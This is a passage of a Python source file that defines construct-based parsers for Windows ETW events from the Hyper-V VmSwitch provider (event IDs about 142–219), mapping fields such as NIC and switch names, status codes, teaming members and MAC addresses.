"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul,
"Status" / Int32ul,
"Flags" / Int32ul,
"BaseCpuNumber" / Int32ul,
"HashInformation" / Int32ul,
"IndirectionTableSize" / Int32ul,
"IndirectionTableOffset" / Int32ul,
"HashSecretKeySize" / Int32ul,
"HashSecretKeyOffset" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=143, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_143_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"BaseCpuNumber" / Int32ul,
"HashInformation" / Int32ul,
"IndirectionTableSize" / Int32ul,
"IndirectionTableOffset" / Int32ul,
"HashSecretKeySize" / Int32ul,
"HashSecretKeyOffset" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=144, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_144_0(Etw):
pattern = Struct(
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=145, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_145_0(Etw):
pattern = Struct(
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=146, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_146_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=147, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_147_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=148, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_148_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NdisOid" / Int32ul,
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=149, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_149_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NetEvent" / Int32ul,
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=150, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_150_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=151, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_151_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=152, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_152_0(Etw):
pattern = Struct(
"OldMember" / Guid,
"NewMember" / Guid
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=153, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_153_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=154, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_154_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=155, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_155_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=156, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_156_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=157, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_157_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Member" / Guid
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=158, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_158_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=159, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_159_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=160, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_160_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=161, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_161_0(Etw):
pattern = Struct(
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=162, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_162_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=163, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_163_0(Etw):
pattern = Struct(
"Aggregator" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=164, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_164_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=165, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_165_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"StatusBufferLen" / Int32ul,
"StatusBuffer" / Bytes(lambda this: this.StatusBufferLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=166, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_166_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Receiver" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=167, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_167_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Receiver" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=168, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_168_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=169, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_169_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Aggregator" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=170, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_170_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=171, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_171_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=173, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_173_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldAggregator" / Int64ul,
"NewAggregator" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=174, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_174_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=175, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_175_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=176, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_176_0(Etw):
pattern = Struct(
"Member" / Guid,
"BufferLen" / Int32ul,
"Buffer" / Bytes(lambda this: this.BufferLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=177, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_177_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldState" / Int32ul,
"NewState" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=178, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_178_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldState" / Int32ul,
"NewState" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=179, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_179_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldState" / Int32ul,
"NewState" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=180, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_180_0(Etw):
pattern = Struct(
"Member" / Guid,
"BufferLen" / Int32ul,
"Buffer" / Bytes(lambda this: this.BufferLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=181, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_181_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldAggregator" / Int64ul,
"NewAggregator" / Int64ul,
"Ready" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=182, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_182_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldAggregator" / Int64ul,
"NewAggregator" / Int64ul,
"Ready" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=183, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_183_0(Etw):
pattern = Struct(
"Member" / Guid,
"ChurnType" / Int32sl,
"OldState" / Int32sl,
"NewState" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=184, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_184_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=185, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_185_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=186, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_186_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=187, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_187_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=188, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_188_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=189, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_189_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=190, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_190_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=191, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_191_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=192, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_192_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=193, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_193_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=194, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_194_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul,
"FailureCode" / Int32ul,
"FailureReason" / Int32ul,
"Ext1" / Int32ul,
"Ext2" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=195, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_195_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul,
"FailureCode" / Int32ul,
"FailureReason" / Int32ul,
"Ext1" / Int32ul,
"HeaderType" / Int32ul,
"HeaderRevision" / Int32ul,
"HeaderSize" / Int32ul,
"ExtensionId" / Guid,
"FeatureId" / Guid,
"SaveDataSize" / Int32ul,
"SaveDataSizeOverflow" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=196, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_196_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul,
"FailureCode" / Int32ul,
"FailureReason" / Int32ul,
"Ext1" / Int32ul,
"HeaderType" / Int32ul,
"HeaderRevision" / Int32ul,
"HeaderSize" / Int32ul,
"ExtensionId" / Guid,
"FeatureId" / Guid,
"SaveDataSize" / Int32ul,
"SaveDataSizeOverflow" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=197, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_197_0(Etw):
pattern = Struct(
"VlanID" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=198, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_198_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=199, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_199_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=200, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_200_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=201, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_201_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=202, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_202_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=203, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_203_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=204, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_204_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"vPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul,
"DstVPortId" / Int32ul,
"VlanId" / Int32ul,
"MacLength" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacLength)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=205, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_205_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"SrcVPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul,
"DstVPortId" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=206, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_206_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=207, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_207_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=208, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_208_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=209, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_209_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=210, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_210_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=211, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_211_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=212, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_212_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFriendlyNameLen" / Int32ul,
"NicFriendlyName" / Bytes(lambda this: this.NicFriendlyNameLen),
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=213, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_213_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFriendlyNameLen" / Int32ul,
"NicFriendlyName" / Bytes(lambda this: this.NicFriendlyNameLen),
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=214, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_214_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFriendlyNameLen" / Int32ul,
"NicFriendlyName" / Bytes(lambda this: this.NicFriendlyNameLen),
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=215, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_215_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"vPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=216, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_216_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=217, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_217_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NetEvent" / Int32ul,
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=218, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_218_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"RoutingDomainCount" / Int32ul,
"MultiTenantStackEnabled" / Int8ul,
"Status" / Int32ul,
"Ext1" / Int32ul,
"Ext2" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=219, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_219_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
